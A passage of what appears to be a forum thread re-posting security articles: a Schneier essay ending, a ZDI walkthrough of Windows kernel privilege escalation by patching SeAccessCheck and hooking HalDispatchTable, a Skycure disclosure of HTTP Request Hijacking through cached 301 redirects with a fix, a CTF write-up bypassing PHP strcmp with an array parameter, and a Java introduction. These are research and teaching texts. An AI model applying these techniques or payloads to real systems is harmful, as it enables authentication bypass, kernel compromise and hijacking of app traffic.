track you more easily. It's the same problem as the "weapons of mass destruction" fear: terrorists with nuclear or biological weapons can do a lot more damage than terrorists with conventional explosives. And by the same token, terrorists with large-scale cyberweapons can potentially do more damage than terrorists with those same bombs. It's a numbers game. Very broadly, because of the way humans behave as a species and as a society, every society is going to have a certain amount of crime. And there's a particular crime rate society is willing to tolerate. With historically inefficient criminals, we were willing to live with some percentage of criminals in our society. As technology makes each individual criminal more powerful, the percentage we can tolerate decreases. Again, remember the "weapons of mass destruction" debate: As the amount of damage each individual terrorist can do increases, we need to do increasingly more to prevent even a single terrorist from succeeding. The more destabilizing the technologies, the greater the rhetoric of fear, and the stronger institutional powers will get. This means increasingly repressive security measures, even if the security gap means that such measures become increasingly ineffective. And it will squeeze the peasants in the middle even more. Without the protection of his own feudal lord, the peasant was subject to abuse both by criminals and other feudal lords. But both corporations and the government -- and often the two in cahoots -- are using their power to their own advantage, trampling on our rights in the process. And without the technical savvy to become Robin Hoods ourselves, we have no recourse but to submit to whatever the ruling institutional power wants. So what happens as technology increases? Is a police state the only effective way to control distributed power and keep our society safe? Or do the fringe elements inevitably destroy society as technology increases their power? Probably neither doomsday scenario will come to pass, but figuring out a stable middle ground is hard. These questions are complicated, and dependent on future technological advances that we cannot predict. But they are primarily political questions, and any solutions will be political. In the short term, we need more transparency and oversight. The more we know of what institutional powers are doing, the more we can trust that they are not abusing their authority. We have long known this to be true in government, but we have increasingly ignored it in our fear of terrorism and other modern threats. This is also true for corporate power. Unfortunately, market dynamics will not necessarily force corporations to be transparent; we need laws to do that. The same is true for decentralized power; transparency is how we'll differentiate political dissidents from criminal organizations. Oversight is also critically important, and is another long-understood mechanism for checking power. This can be a combination of things: courts that act as third-party advocates for the rule of law rather than rubber-stamp organizations, legislatures that understand the technologies and how they affect power balances, and vibrant public-sector press and watchdog groups that analyze and debate the actions of those wielding power. Transparency and oversight give us the confidence to trust institutional powers to fight the bad side of distributed power, while still allowing the good side to flourish. For if we're going to entrust our security to institutional powers, we need to know they will act in our interests and not abuse that power. Otherwise, democracy fails. In the longer term, we need to work to reduce power differences. The key to all of this is access to data. On the Internet, data is power. To the extent the powerless have access to it, they gain in power. To the extent that the already powerful have access to it, they further consolidate their power. As we look to reducing power imbalances, we have to look at data: data privacy for individuals, mandatory disclosure laws for corporations, and open government laws. Medieval feudalism evolved into a more balanced relationship in which lords had responsibilities as well as rights. Today's Internet feudalism is both ad-hoc and one-sided. Those in power have a lot of rights, but increasingly few responsibilities or limits. We need to rebalance this relationship. In medieval Europe, the rise of the centralized state and the rule of law provided the stability that feudalism lacked. The Magna Carta first forced responsibilities on governments and put humans on the long road toward government by the people and for the people. In addition to re-reigning in government power, we need similar restrictions on corporate power: a new Magna Carta focused on the institutions that abuse power in the 21st century. Today's Internet is a fortuitous accident: a combination of an initial lack of commercial interests, government benign neglect, military requirements for survivability and resilience, and computer engineers building open systems that worked simply and easily. Corporations have turned the Internet into an enormous revenue generator, and they're not going to back down easily. Neither will governments, which have harnessed the Internet for political control. We're at the beginning of some critical debates about the future of the Internet: the proper role of law enforcement, the character of ubiquitous surveillance, the collection and retention of our entire life's history, how automatic algorithms should judge us, government control over the Internet, cyberwar rules of engagement, national sovereignty on the Internet, limitations on the power of corporations over our data, the ramifications of information consumerism, and so on. Data is the pollution problem of the information age. All computer processes produce it. It stays around. How we deal with it -- how we reuse and recycle it, who has access to it, how we dispose of it, and what laws regulate it -- is central to how the information age functions. And I believe that just as we look back at the early decades of the industrial age and wonder how society could ignore pollution in their rush to build an industrial world, our grandchildren will look back at us during these early decades of the information age and judge us on how we dealt with the rebalancing of power resulting from all this new data. This won't be an easy period for us as we try to work these issues out. Historically, no shift in power has ever been easy. Corporations have turned our personal data into an enormous revenue generator, and they're not going to back down. Neither will governments, who have harnessed that same data for their own purposes. But we have a duty to tackle this problem. I can't tell you what the result will be. These are all complicated issues, and require meaningful debate, international cooperation, and innovative solutions. We need to decide on the proper balance between institutional and decentralized power, and how to build tools that amplify what is good in each while suppressing the bad. This essay previously appeared in the Atlantic. Sursa: https://www.schneier.com/blog/archives/2013/10/the_battle_for_1.html
  19. Verifying Windows Kernel Vulnerabilities DaveWeinstein| October 30, 2013 Outside of the Pwn2Own competitions, HP’s Zero Day Initiative (ZDI) does not require that researchers provide us with exploits. ZDI analysts evaluate each submitted case, and as part of that analysis we may choose to take the vulnerability to a full exploit. For kernel level vulnerabilities (either in the OS itself, or in device drivers), one of the vulnerabilities that we find is often termed a ‘write-what-where’[1]. For ease of analysis it was worth writing a basic framework to wrap any given ‘write-what-where’ vulnerability and demonstrate an exploit against the operating system. There are three basic steps to taking our arbitrary write and turning it into an exploit, and we’ll explore each of them in turn. The Payload: Disabling Windows Access Checks At the heart of the Windows access control system is the function nt!SeAccessCheck. This determines whether or not we have the right to access any object (file, process, etc) in the OS. The technique we’re going to use was first described by Greg Hoglund in 1999[2], and a variant of this technique was used by John Heasman in 2006[3]; it is the latter that we’ll use as our jumping off point. The key here is the highlighted field. If the security check is being done on behalf of a user process, then the OS checks for the correct privileges. However, if the security check is being done on behalf of the kernel, then it always succeeds. Our goal, then, is to dynamically patch the Windows kernel such that it always considers the AccessMode setting to indicate that the call is on behalf of the kernel. On Windows XP, this is a fairly straightforward task. If we examine the kernel in IDA (in this case, we’re looking at ntkrnlpa.exe), we find the following code early in the implementation of SeAccessCheck: PAGE:005107BC xor ebx, ebx PAGE:005107BE cmp [ebp+AccessMode], bl PAGE:005107C1 jnz short loc_5107EC Since KernelMode is defined as 0 in wdm.h, all we have to do to succeed in all cases is to NOP out the conditional jump after the compare. At that point, all access checks succeed. On later versions of the OS, things are slightly more complicated. The function nt!SeAccessCheck calls nt!SeAccessCheckWithHint, and it is the latter that we’ll need to patch. We’ll see why this makes things more complicated when we look at how to gather the information needed to execute the attack. If we look at Windows 8.1, we can see that instead of dropping through to the KernelMode functionality, we branch to it: .text:00494613 loc_494613: .text:00494613 cmp [ebp+AccessMode], al .text:00494616 jz loc_494B28 ll we need to do is replace the conditional branch with an unconditional branch, and we again make every call to SeAccessCheck appear to come from the kernel. Now that we have a target, we still have one more, slight problem to overcome. The memory addresses we need to overwrite are in read-only pages. We could change the settings on those pages, but there is an easier solution. On the x86 and x64 processors, there is a flag in Control Register 0 which determines whether or not supervisor mode code (i.e. Ring 0 code, which is to say, our exploit) pays attention to the read-only status of memory. To quote Barnaby Jack[4]: “Disable the WP bit in CR0.? Perform code and memory overwrites.? Re-enable WP bit.” At this point, the actual core of our exploit looks like this: There is one additional complication to our manipulation of the WP bit. We need to set the processor affinity for our exploit, to make sure that we stay on the core with the processor settings we chose. While this is likely unnecessary for our manipulation of the WP bit, it is more of an issue in more complicated exploits that require us to disable SMEP (more on that later). Either way, it doesn’t hurt, and all we have to do is a make simple call: SetProcessAffinityMask(GetCurrentProcess(), (DWORD_PTR) 1); Now, one thing you’ll note in the exploit code is that we don’t actually know what the patch is, or where it is going. The exploit just takes information that was already provided, and applies it. We’ll actually determine that information as part of the exploit research. The Attack: Passing control to the exploit We have code ready to run in ring 0. We need two things to make it work, the information it requires about the OS configuration, and a means to transfer control to our code while the processor is in supervisor mode. Since the primitive that we have to work with is a ‘write-what-where’, we are going to use that to overwrite a function in the HalDispatchTable. This technique, described by Ruben Santamarta in 2007[5], will allow us to divert execution flow to our exploit code. The function we’re going to hook is hal!HaliQuerySystemInformation. This is a function that is called by an undocumented Windows function NtQueryIntervalProfile [5][6], and the invoking function is not commonly used. To understand why this is crucial, we need to briefly talk about the layout of memory in Windows. Windows divides memory into two ranges; kernel memory is located above MmUserProbeAddress, and user memory is located below it. Memory in the kernel is common to all processes (although generally inaccessible to the process code itself), while memory in userland is different for each process loaded. Since our exploit code is going to be in user memory, but we are hooking a kernel function pointer, if any other process calls NtQueryIntervalProfile it will almost certainly crash the operating system. Because of this, the first step in our exploit is to restore the original function pointer: As with our earlier example, you can see that we’re relying on external information as to where the function pointer entry is, and what the original value should be. At this point, our actual exploit trigger looks like this: For flexibility, our prototype for WriteWhatWhere() also includes the original value for the address, if known. Finding the addresses we need for both the exploit and the exploit hook is the final step. The Research: Determining the OS Configuration In this case, we’re assuming that we are looking for a local elevation-of-privilege. We have the ability to run arbitrary code on the system as some user, and our goal is to turn that into a complete system compromise. Determining the OS Configuration is much more difficult in the case of a remote attack against a kernel vulnerability. We’ve determined that we need to know the following pieces of information: The address of nt!HalDispatchTable The address of hal!HaliQuerySystemInformation The address of the code in nt!SeAccessCheck or related helper function we need to patch The value to patch Additionally, we can also look up the original value, which would let us have a different exploit that restored the original functionality. After all, once we’ve done what we need to do, why leave the door open? What we’ll need to know are the base addresses of two kernel modules, the hardware abstraction layer (HAL) and the NT kernel itself. In order to get those, we’ll need to again use an undocumented function – in this case we need NtQuerySystemInformation[6][7]. Since we know that we’re going to need two NT functions, we’ll go ahead and create the prototypes and simply load them directly from the NT DLL: The next step is to determine which versions of these modules are in use, and where they are actually located in memory. We do this by using NtQuerySystemInformation to pull in the set of loaded modules, and then searching for the possible names for the modules we need: Our next step is, in almost every case other than this, a bad idea[8]. We’re going to use a highly deprecated feature of LoadLibraryEx and load duplicate copies of the two modules we found: With this flag set, we won’t load any referenced modules, we won’t execute any code, but we will be able to use GetProcAddress() to search the modules. This is exactly what we want, because we’re going to be using these loaded modules as our source to search for what we need in the actual running kernel code. At this point, we have almost everything we’re going to need to find the offsets we require. We have both the base address of our copies of the kernel modules and the actual base addresses on the system, so we can convert a relative address (RVA) from our copy into an actual system address. And we have read-access to copies of the code, so we can scan the code to look for identifiers for the functions we need. The only thing left is actually a stock Windows call, and we’ll use GetVersionEx() to determine what version of Windows is running. Some things are easy, because the addresses are exported: But for most of what we need, we’re actually going to have to search. We have two functions to search for, one of which (hal!HaliQuerySystemInformation) does not have an exported symbol, and the other is either nt!SeAccessCheck or a function directly called by it. We’ll look at the last case, because that lets us look at how we handle both exported functions and those that are purely private. First, a look at nt!SeAccessCheck: And then a look at the portion of nt!SeAccessCheckWithHint that we’re going to patch: Now, in practice, these two functions are adjacent to each other, but we’re going to go ahead and use the public function to track down the reference to the internal function, and then scan the internal function for our patch location. The code to do that looks like this: The function PatternScan is simply a helper routine that given a pointer, a scan size, a scan pattern, and a scan pattern size, finds the start of the pattern (or NULL if no pattern could be found). In the code above, we search first for the relative jump to nt!SeAccessCheckWithHint, and extract the offset. We use that to calculate the actual start of the nt!SeAccessCheckWithHint in our copy of the module, and then we scan for the identifying pattern of the conditional branch we need to replace. Once we find the location, we can determine the actual address by converting it first to an RVA and then rebasing it off of the actual loaded kernel image. Finally, the replacement value is OS version dependent as well; in this case the replacement for the JZ (0x0f 0x84) is a NOP (0x90) and JMP (0xe9). By gathering the information we need from the copied version of the system modules, we’re able to have the same framework target multiple versions of the Windows Operating System. By searching for patterns within the target functions, we are more resistant to changes in the OS that aren’t directly in the functions we’re looking for. Some final complications Everything we’ve done so far will work, up until we get to Windows 8, or more specifically, the NT 6.2 kernel. For convenience, we have the actual code of the exploit running in user memory. With the Ivy-Bridge architecture, Intel introduced a feature called Supervisor Mode Execute Protection (SMEP) [9]. If SMEP is enabled, the processor faults if we attempt to execute instructions from user-mode addresses while the processor is in supervisor-mode. The moment control passes from our hooked function pointer in the kernel to our code, we get an exception. Windows supports SMEP as of Windows 8/Server 2012, and the feature is enabled on processors that support it by default. To get around this, we either need to move our exploit into executable kernel memory (something that is also made more difficult in the NT 6.2 kernel)[10] or disable SMEP separately[11][12]. The final problem for us was introduced in Windows 8.1. In order to get Windows 8.1 to tell us the real version of the Operating System, we need to take additional steps. According to MSDN[13]: With the manifest included, we’re able to correctly detect Windows 8.1, and adjust our search parameters appropriately when determining offsets. Conclusion There is of course, one piece missing. While a framework to prove exploitation is useful, we still need to have an arbitrary ‘write-what-where’ for this to work. We use this framework internally to validate these flaws, so if you happen to find a new one, you can always submit it to us (with or without an exploit payload) at Zero Day Initiative. We’d love to hear from you. Endnotes [1] The earliest formal reference I can find to this terminology is in Gerardo Richarte’s paper “About Exploits Writing” (G-CON 1, 2002) where he divides the primitive into a “write-anything-somewhere” and “write-anything-anywhere”. In this case, our “write-what-where” is a “write-anything-anywhere”. [2] Greg Hoglund, “A *REAL* NT Rootkit, patching the NT Kernel” (Phrack 55, 1999) [3] John Heasman, “Implementing and Detecting an ACPI BIOS Rootkit” (Black Hat Europe, 2006) [4] Barnaby Jack, “Remote Windows Kernel Exploitation – Step In To the Ring 0” (Black Hat USA, 2005) [White Paper] [5] Ruben Santamarta, “Exploiting Common Flaws in Drivers” (2007) [6] Although it does not cover newer versions of the Windows OS, Windows NT/2000 Native API Reference (Gary Nebbett, 2000) is still an excellent reference for internal Windows API functions and structures. [7] Alex Ionescu, “I Got 99 Problems But a Kernel Pointer Ain’t One” (RECon, 2013) [8] Raymond Chen, “LoadLibraryEx(DONT_RESOLVE_DLL_REFERENCES) is fundamentally flawed” (The Old New Thing) [9] Varghese George, Tom Piazza, and Hong Jiang, “Intel Next Generation Microarchitecture Codename Ivy Bridge” (IDF, 2011) [10] Ken Johnson and Matt Miller, “Exploit Mitigation Improvements in Windows 8” (Black Hat USA, 2012) [11] Artem Shishkin, “Intel SMEP overview and partial bypass on Windows 8” (Positive Research Center) [12] Artem Shisken and Ilya Smit, “Bypassing Intel SMEP on Windows 8 x64 using Return-oriented Programming” (Positive Research Center) [13] MSDN, “Operating system version changes in Windows 8.1 and Windows Server 2012 R2” Additional Reading Enrico Perla and Massimiliano Oldani, A Guide to Kernel Exploitation: Attacking the Core, (Syngress, 2010) bugcheck and skape, “Kernel-mode Payloads on Windows”, (Uninformed Volume 3, 2006) skape and Skywing, “A Catalog of Windows Local Kernel-mode Backdoor Techniques”, (Uninformed Volume 8, 2007) mxatone, “Analyzing local privilege escalations in win32k”, (Uninformed Volume 10, 2008) Sursa: Verifying Windows Kernel Vulnerabilities - HP Enterprise Business Community
  20. HTTP Request Hijacking Posted by Yair Amit Preface This post contains details about a coding pitfall I recently identified in many iOS applications, which we call HTTP Request Hijacking (HRH). Adi Sharabani, Skycure’s CEO, and I will be presenting the problem, its ramifications, and some fix suggestions to developers later today at RSA Europe (14:10 – 15:00 | Room: G102). If you are an iOS developer in a hurry to fix this issue, feel free to jump over to the “Remediation” section. We’ve created a quick-and-easy solution that will automatically protect all vulnerable iOS apps. Overview Nowadays almost all mobile applications interact with a server to send or retrieve data, whether it’s information to display or commands to be executed. Many of these applications are susceptible to a simple attack, in which the attacker can persistently alter the server URL from which the app loads its data (e.g., instead of loading the data from real.site the attack makes the app persistently load the data from attacker.site). While the problem is generic and can occur in any application that interacts with a server, the implications of HRH for news and stock-exchange apps are particularly interesting. It is commonplace for people to read the news through their smartphones and tablets, and trust what they read. If a victim’s app is successfully attacked, she is no longer reading the news from a genuine news provider, but instead phoney news supplied by the attacker’s server. Upon testing a variety of high profile apps, we found many of them vulnerable. This brings us to a philosophical question: When someone gets up in the morning and reads news via her iPhone, how sure can she be that the reports she reads are genuine and not fake ones planted by a hacker? HTTP Request Hijacking The problem in a nutshell The problem essentially revolves around the impact of HTTP redirections caching in mobile applications. Many iOS applications cache HTTP status code 301 when received over the network as a response. While the 301 Moved Permanently HTTP response has valuable uses, it also has severe security ramifications on mobile apps, as it could allow a malicious attacker to persistently alter and remotely control the way the application functions, without any reasonable way for the victim to know about it. Whereas browsers have an address bar, most mobile apps do not visually indicate the server they connect to, making HRH attacks seamless, with very low probability of being identified by the victims. HTTP Request Hijacking attacks start with a Man-in-the-middle scenario. When the vulnerable app sends a request to its designated server (e.g., http://www.real.site/resource), the attacker captures it and returns a 301 HTTP redirection to an attacker-controlled server (e.g., http://www.attacker.site/resource). Lets take a look at the RFC of 301 Moved Permanently HTTP response: 10.3.2 301 Moved Permanently The requested resource has been assigned a new permanent URI and any future references to this resource SHOULD use one of the returned URIs. Clients with link editing capabilities ought to automatically re-link references to the Request-URI to one or more of the new references returned by the server, where possible. This response is cacheable unless indicated otherwise. Source: RFC 2616 Fielding, et al The 301 HTTP redirection issued by the attacker is therefore kept in the app’s cache, changing the original code’s behavior from then on. Instead of retrieving data from http://www.real.site, the app now loads data from http://www.attacker.site, even after the MiTM attack is over and the attacker is long gone. How it all began One evening, Assaf Hefetz and Roy Iarchy, two Skycure engineers, called me over and told me they had come across a weird redirection bug in our product. We started discussing it when it suddenly hit me that this “bug” might in fact be a widespread vulnerability waiting to be discovered! A few days later we had a “white night” (work into the night) that resulted in a working PoC of an attack against a well-known iOS application. We went on to test a bunch of high profile applications, and were amazed to find that about half of them were susceptible to HRH attacks. Focusing on leading app store news apps, we found many of them vulnerable and easy to exploit. Unlike most vulnerabilities, where a responsible disclosure could be made in private to the vendor in charge of the vulnerable app, we soon realized that HTTP Request Hijacking affects a staggering number of iOS applications, rendering the attempt to alert vendors individually virtually impossible. We therefore chose to reveal the problem, along with clear and detailed fix instructions, to empower developers to fix their code quickly and efficiently, before hackers attempt to exploit it. The Skycure Journal: A Responsible Disclosure case study As part of our Responsible Disclosure policy, we decided to not name specific vulnerable apps we are aware of as long as they are not fixed. Therefore, for the sake of discussing the technical nature of the problem and our proposed fix, we created a sample news application, which we called “The Skycure Journal”. You can clone its code through . While very basic, The Skycure Journal operates in a similar way to most major news apps: it loads a feed of news from a server (http://skycure-journal.herokuapp.com/) in JSON format, parses it, and then displays it to the reader. Img. 1 – Skycure Journal App Here’s a relevant snippet from the code: - ( void ) fetchArticles { NSURL * serverUrl = [ NSURL URLWithString : @ "http://skycure-journal.herokuapp.com" ] ; NSMutableURLRequest * request = [ NSMutableURLRequest requestWithURL : serverUrl ] ; [ request setValue : @ "application/json" forHTTPHeaderField : @ "Content-Type" ] ; self.connection = [ [ NSURLConnection alloc ] initWithRequest : request delegate : self ] ; } This code, variations of which can be found in many iOS apps, is susceptible to network-based HRH attack. By capturing the request to http://skycure-journal.herokuapp.com/ (via a MiTM attack, for example) and returning a 301 Moved Permanently HTTP response directing the victim’s app to an attacker controlled server (e.g., http://ATTACKER/SJ_headlines.json), the Skycure Journal logic will persistently change to loading data from the attacker’s server, no matter where and when the victim uses it in the future. Without touching the application binary, HRH makes it behave as if the code was altered to this: NSURL * serverUrl = [ NSURL URLWithString : @ "http://ATTACKER/SJ_headlines.json" ] ; A quick demo Imagine the following scenario: A victim walks into Starbucks, connects to the Wi-Fi and uses her favorite apps. Everything looks and behaves as normal, however an attacker is sitting at a nearby table and performs a silent HRH attack on her apps. The next day, she wakes up at home and logs in to reads the news, but she’s now reading the attacker’s news! Ariel Sakin, Skycure’s head of engineering, and Igal Kreichman, Skycure engineer, created a really cool demo showing how the attack appears from the attacker’s and victim’s perspectives. While cache attacks have been thoroughly discussed in the past, they were perceived more as a browser problems than a native apps problem. The reason is that by performing a classical cache poisoning attack (e.g., returning a fake json/XML response with cache-control directives) on native apps, the impact is very limited. In such attacks, since the cached response is static by nature (as long as the native app does not rely on an embedded browser to render it), the attacker would not be able to persistently view, control or manipulate the apps’ traffic. On the other hand, HRH attacks give the attacker remote and persistent control over the victim’s app. HRH limitations and advanced techniques The aforementioned attack has two limitations: The attacker needs to be physically near the victim for the initial poisoning (the next steps of HRH attack can be carried on the victim regardless of geolocation). The attack works only against HTTP traffic (well, almost only). In a previous post, we uncovered the ramifications of malicious profiles. It is interesting to note that by luring a victim to install a malicious profile that contains a root CA, an attacker can mount HRH attacks on SSL traffic as well. Combining the malicious profiles threat we uncovered together with this new threat of HTTP Request Hijacking, generates a troubling scenario: Even after the malicious profile is identified and removed from the device, attacked apps continue to interact seamlessly with the attacker’s server instead of the real server, without the victim’s knowledge. Remediation For app developers HRH affects a large proportion of iOS apps and we want to help ensure as many as possible are properly protected before exploits of this vulnerability start to appear. There are two main approaches for tackling HRH: Option A Make sure the app interacts with its designated server(s) via an encrypted protocol (e.g., HTTPS, instead of HTTP). As described earlier in the post, this is an effective mitigation for HRH, but not a fix. Option B Assaf Hefetz, of our R&D team, has come up with this cool and simple fix for vulnerable apps. Step 1 Create a new subclass object of NSURLCache that avoids 301 redirection caching. Leave the rest of the logic intact. #define DEFAULT_MEMORY_CAPACITY 512000 #define DEFAULT_DISK_CAPACITY 10000000 HRHResistantURLCache *myCache = [HRHResistantURLCache alloc]; [myCache initWithMemoryCapacity:DEFAULT_MEMORY_CAPACITY diskCapacity:DEFAULT_DISK_CAPACITY diskPath:@"MyCache.db"]; [NSURLCache setSharedURLCache:myCache]; Step 2 Set the new cache policy to be used by the app, making sure you place the initialization code before any request in your code. @interface HRHResistantURLCache : NSURLCache @end @implementation HRHResistantURLCache - (void)storeCachedResponse:(NSCachedURLResponse *)cachedResponse forRequest:(NSURLRequest *)request { if (301 == [(NSHTTPURLResponse *)cachedResponse.response statusCode]) { return; } [super storeCachedResponse:cachedResponse forRequest:request]; } @end For CIOs/CISOs We see a significant increase in attacks mounted via the networks around us. Some affect apps; others the entire device. Skycure is dedicated to providing companies with a solution that detects and protects employee devices from a variety of trending mobile security threats. If you are interested, why not to start a free trial. For iOS users If you believe you’ve been subject to an HRH attack, remove the app and then reinstall it, to ensure the attack is removed. Then please drop us a line at security@skycure.com to tell us about it. It is of course always recommended to keep your apps fully up-to-date, so that when fixes are released, you’ll have them installed on your device at the earliest opportunity. Do this either manually or by enabling auto-update in iOS 7. Future work In this write-up we’ve discussed the impact of 301 HTTP responses on mobile applications. Note that there are other redirection responses that might also prove to be problematic, such as 308 HTTP response (it is still a draft). HRH isn’t necessarily a problem of iOS applications alone; it may apply to mobile applications of other operating systems too. Sursa: Skycure HTTP Request Hijacking
  21. [h=3]Unauthorized Access: Bypassing PHP strcmp()[/h]While playing Codegate CTF 2013 this weekend, I had the opportunity to complete Web 200 which was very interesting. So, let get our hands dirty. The main page asks you to provide a valid One-Time-Password in order to log in: A valid password can be provided by selecting the "OTP issue" option, we can see the source code (provided during the challenge) below: include("./otp_util.php"); echo "your ID : ".$_SERVER["REMOTE_ADDR"].""; echo "your password : " .make_otp($_SERVER["REMOTE_ADDR"]).""; $time = 20 - (time() - ((int)(time()/20))*20); echo "you can login with this password for $time secs."; A temporary password is calculated based on my external IP (208.54.39.160) which will last 20 seconds or less, below the result: So, then I clicked on "Login" option (see first image above) and below POST data was sent: id=208.54.39.160&ps=69b9a663b7cafaca2d96c6d1baf653832f9d929b Which gave me access to the web site (line 6 in the code below): But we cannot reach line 9 (see code below) in order to get the flag since the IP in the "id" parameter was different. Let's analyze the script that handles the Login Form (login_ok.php): 1. $flag = file_get_contents($flag_file); 2. if (isset($_POST["id"]) && isset($_POST["ps"])) { 3. $password = make_otp($_POST["id"]); 4. sleep(3); // do not bruteforce 5. if (strcmp($password, $_POST["ps"]) == 0) { 6. echo "welcome, ".$_POST["id"] 8. if ($_POST["id"] == "127.0.0.1") { 9. echo "Flag:".$flag } } else { echo "alert('login failed..')"; } } Test case 1: Spoofing Client IP Address: So, the first thing that came to my mind in order to get the flag (line 9) was to send "127.0.0.1" in the "id" parameter, so, let's analyze the function make_otp() which calculates the password: $flag_file = "flag.txt"; function make_otp($user) { // acccess for 20secs. $time = (int)(time()/20); $seed = md5(file_get_contents($flag_file)).md5($_SERVER['HTTP_USER_AGENT']); $password = sha1($time.$user.$seed); return $password; } As we can see in the code above, the function make_otp receives the "id" parameter in the $user variable and is used to calculate the password, so, by following this approach, we will not be able to pass line 5 since we need a password for the IP 127.0.0.1, and we can only request passwords based on our external IP via "OTP Issue" option as explained above, so, how can we get one? What if we try to find a vulnerability in the code related to "OTP Issue" option? So, since "OTP Issue" is reading the IP based on the environment variable "REMOTE_ADDR" we could try to spoof our external IP address as if we were connecting from 127.0.0.1, but unfortunately it is not a good option, although spoofing could be possible, it is only an one way communication so we would not get a response from the Server, so at this point, we need to discard this approach. Test case 2: Bruteforcing the password By looking at the make_otp() function shown above, the only data we do not know in the password calculation process, is the content of $flag_file (obviously), so, assuming that the content of that file is less than 4-5 characters and therefore have a chance to bruteforce the MD5 hash, we only would have 20 seconds to guess it, and due to the sleep(3) command (see line 4 above), we could only guess 6 passwords before the password expires and therefore we definitely drop bruteforcing approach off the table. Test case 3: Bypassing strcmp() function After analyzing the two cases described above I started "googling" for "strcmp php vulnerabilities" but did not find anything, then, by looking at PHP documentation and realized this function has only three possible return values: int strcmp ( string $str1 , string $str2 ) Returns < 0 if str1 is less than str2; > 0 if str1 is greater than str2, and 0 if they are equal. Obviously, we need to find a way to force strcmp to return 0 and be able to bypass line 5 (see above) without even knowing the password, so, I started wondering what would be the return value if there is an error during the comparison? So, I prepare a quick test comparing str1 with an Array (or an Object) instead of another string: $fields = array( 'id' => '127.0.0.1', 'ps' => 'bar' ); $a="danux"; if (strcmp($a,$fields) == 0){ echo " This is zero!!"; } else{ echo "This is not zero"; } And got below warning from PHP: PHP Warning: strcmp() expects parameter 2 to be string, array given in ... But guess what?Voila! it also returns the string "This is zero!!" In other words, it returns 0 as if both values were equal. So, the last but not least step is to send an Array in the "ps" POST parameter so that we can bypass line 5, after some research and help from my friend Joe B. I learned I can send an array this way: id=127.0.0.1&amp;ps[]=a Notice that instead of sending "&ps=a", I also send the square brackets [] in the parameter name which will send an array object!! Also, notice that I am sending "id=127.0.0.1" so that I can get to the line 9. And after sending this POST request... Conclusion: I tested this vulnerability with my local version of PHP/5.3.2-1ubuntu4.17, I do not know the version running in the CTF Server but should be similar. After this exercise, I would suggest you all make sure you are not using strcmp() to compare values coming from end users (via POST/GET/Cookies/Headers, etc), this also reminds me the importance of not only validate parameter values BUT also parameter names as described in on of my previous blogs here. Hope you enjoy it. Thanks to CODEGATE Team to prepare those interesting challenges! Posted by Danux Sursa: Regalado (In) Security: Unauthorized Access: Bypassing PHP strcmp()
  22. Demystifying Java Internals (An introduction) Volume 1 Java is a technology that makes it easy to develop distributed applications, which are programs that can be executed by multiple computers across a network, whether it is local or a wide area network. Java has expanded the Internet role from an arena for communications to a network on which full-fledged applications can be executed. Ultimately, this open source technology gives the impression of network programming across diverse platform. This article illustrates these underlying contents in detail: Genesis of Java Java and the World Wide Web Beauty of Java: The “Bytecode” Java Framework Configuration Java Features Summary Before Java, the Internet was used primarily for sharing information, though developers soon realized that the World Wide Web could meet some business needs. The WWW is a technology that treats Internet resources as linked and it has revolutionized the way people access information. The web has enabled Internet users to access Internet services without learning sophisticated cryptic commands. Through the web, corporations can easily provide product information and even sell merchandise. Java technology takes this a step further by making it possible to offer fully interactive applications via the web. In particular, Java programs can be embedded into web documents, turning static pages into applications that run on the user’s computer. Java has the potential to change the function of the Internet, much as the web has changed the way people access the Internet. In other words, not only will the network provide information, it will also serve as an operating system. Genesis of Java In 1990, Java was conceived by James Gosling, Patrick Naughton, and Ed Frank at Sun Microsystems. This language was initially known as Oak. Oak preserved the familiar syntax of C++ but omitted the potentially dangerous features, such as pointer arithmetic, operator overloading, and explicit resource references. Oak incorporated memory management directly into the language, freeing the programmer to concentrate on the task to be performed by the program. As Oak matured, the WWW was growing dramatically, and the component team at Sun realized that Oak was perfectly suited to Internet programming. Thus, in 1994, they completed work on a product known as WebRunner, an early browser written in Oak. WebRunner was later renamed HotJava, and it demonstrate the power of Oak as Internet development tool. Finally, in 1995, Oak was renamed Java and introduced at Sun. Since then, Java’s rise in popularity has been dramatic. Java is related to C++, which is a direct descendent of C. Much of the character of Java is inherited from those two languages. From C, Java derives its semantics. Java is truly an object-oriented, case-sensitive programming language. Many of Java OOPs features were influenced by C++. The original Impetus for Java was not the Internet. Instead, the primary motivation was the need for a platform-independent language that could be used to create software to be embedded in various consumer electronic devices. The trouble with C and C++ is that they are designed to be compiled for a specific target, so an easier and more cost-efficient solution was Java technology, a truly open source technology. Java and the World Wide Web Today, the web acts as a convenient transport mechanism for Java programs, and the Web’s ubiquity has popularized Java as an Internet development tool. Java expands the universe of objects that can move about freely in cyberspace. In a network, two very broad categories of objects are transmitted between a server and your personal computer: passive information and dynamic active programs. For example, when you read your e-mails, you are viewing passive data. However, a second type of object can be transmitted to your computer: a dynamic, self-executing program. For example, a program might be provided by the server to display properly the data that the server is sending. A dynamic network program presents serious problems in the areas of security and portability. As you will see, Java addresses those concerns effectively by introducing a new form of program: the applet. Java primarily stipulates two types of programs: applets and application. An applet is an application designed to be transmitted over the Internet and executed by a Java-compatible web browser. An applet is a tiny Java program that can be dynamically downloaded across the network. It is a kind of program that can react to user input and be changed dynamically. On the other hand, an application runs on your computer under the operating system of that computer, such as an application created in the C or C++ language. Java technology provides portable code execution across diverse platforms. Many types of computers and operating systems are in use throughout the world, and many are connected to the Internet. For programs to be dynamically downloaded to all the various type of platforms connected to the Internet, some means of generating portable executing code is needed. Beauty of Java: The “Byte-code” The Java compiler does not produce executable code in order to resolve security and portability issues. Rather, it is Bytecode, which is a highly optimized set of instructions designed to be executed by the Java run-time system, known as the Java Virtual Machine (JVM). The JVM is essentially an interpreter for Bytecode. Translating a Java program into Bytecode helps makes it much easier to run a program on a wide variety of platforms such as Linux, Windows and Mac. The only requirement is that the JVM needs to be implemented for each platform. Once the run-time package exists for a given system, any Java program, can execute on it. Although the details of the JVM will differ from platform to platform, all interpret the same Java Bytecode. Thus, the interpretation of Bytecode is a feasible solution to create a truly portable program. In fact, most modern technology such as C++ and C# is designed to be compiled, not interpreted, mostly because of concern about performance. When a program is interpreted, it generally runs substantially slower than it would run if compiled to executable code. The use of Bytecode enables the Java run-time system to execute programs much faster than you might expect. To execute Java Bytecode, the JVM uses a class loader to fetch the Bytecodes from a network or disk. Each class file is fed to a Bytecode verifier that ensures the class is formatted correctly and will not corrupt memory when it is executed. The JIT compiler converts the Bytecodes to native code instructions on the user’s machine immediately before execution. The JIT compiler runs on the user machine and is transparent to the users; the resulting native code instructions do not need to be ported because they are already at their destination. The following figure illustrates how the JIT compiler works. Prerequisite In order to write and execute a program written in Java language, we are supposed to configure our 